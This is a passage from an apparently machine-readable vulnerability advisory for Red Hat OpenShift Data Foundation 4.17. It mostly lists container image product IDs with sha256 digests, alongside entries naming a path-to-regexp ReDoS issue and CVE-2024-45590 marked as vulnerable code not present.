"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "path-to-regexp: Backtracking regular expressions cause ReDoS", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", 